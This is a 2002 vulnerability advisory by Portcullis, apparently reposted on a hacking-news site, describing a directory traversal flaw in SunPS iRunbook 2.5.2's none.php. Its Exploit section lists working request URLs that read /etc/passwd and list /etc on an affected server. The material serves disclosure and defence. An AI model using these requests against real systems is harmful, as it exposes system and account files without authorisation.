Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Directory Traversal Vulnerability in SunPS iRunbook 2.5.2

Directory Traversal Vulnerability in SunPS iRunbook 2.5.2

by Nikola Strahija on July 12th, 2002 The file none.php used in iRunbook Explorer to view files from the build snapshot can be manipulated to view any files or folders on the server providing the web server user has read access to the file and directory. It was initially achieved by studying the request strings in the links to view files in the build report and seeing that it makes requests for file paths with ":" of instead of the usual "/".


Thus is was possible to use directory
traversal to view any file or folder. Later it was discovered that the
"..:..:" wasn't needed to traverse directories and the path to the file just
needs to be entered in the web browser after the ?.

Impact:

Any user that can access the webserver can view files and directories on the
system that are usually world readable such as /etc/ and /etc/passwd.

Exploit:

view passwd file -

http:///content/base/build/explorer/none.php?..:..:..:..:..:.
.:..:etc:passwd:

or

http:///content/base/build/explorer/none.php?/etc/passwd

view contents of /etc directory -

http:///content/base/build/explorer/none.php?..:..:..:..:..:.
.:..:etc:

or

http:///content/base/build/explorer/none.php?/etc/


Copyright © Portcullis Computer Security Limited 2002, All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the
express written consent of Portcullis Computer Security Limited.

Disclaimer: The information herein contained may change without notice. Use
of this information constitutes acceptance for use in an AS IS condition.
There are NO warranties, implied or otherwise, with regard to this
information or its use. Any use of this information is at the user's risk.
In no event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

John Clayton
Portcullis Computer Security Ltd.
Security Testing Services Team Leader and
Dragon IDS Technical Product Manager
www.portcullis-security.com


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »